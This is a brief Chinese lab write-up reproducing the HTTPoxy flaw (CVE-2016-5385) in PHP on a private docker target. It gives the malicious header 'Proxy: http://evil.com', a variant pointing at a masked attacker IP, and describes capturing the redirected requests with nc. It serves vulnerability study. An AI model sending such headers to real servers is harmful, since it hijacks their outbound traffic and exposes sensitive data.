CVE-2016-5385_HTTPoxy漏洞_PHP
靶场:192.168.4.10_ubuntu
前言
根据RFC 3875规定,CGI(fastcgi)要将用户传入的所有HTTP头都加上`HTTP_`前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的`HTTP_PROXY`值作为HTTP代理地址。于是,恶意用户通过提交`Proxy: http://evil.com`这样的HTTP头,将使用缺陷类库的网站的代理设置为`http://evil.com`,进而窃取数据包中可能存在的敏感信息。
漏洞复现
本环境使用PHP 5.6.23为例。
1. 环境搭建
#docker-compose up -d
2. 漏洞利用
访问http://192.168.4.10:8080/index.php,可看到origin:显示为当前请求服务地址
添加附带头Proxy: http://*.*.*.114:30001 ,访问http://192.168.4.10:8080/index.php,,
综上,真正进行HTTP访问的服务器是`*.*.*.114`,也就是说正常的HTTP请求代理在`*.*.*.114`上,在`*.*.*.114`上使用NC,就可以捕获当前请求的数据包,其中可能包含敏感数据。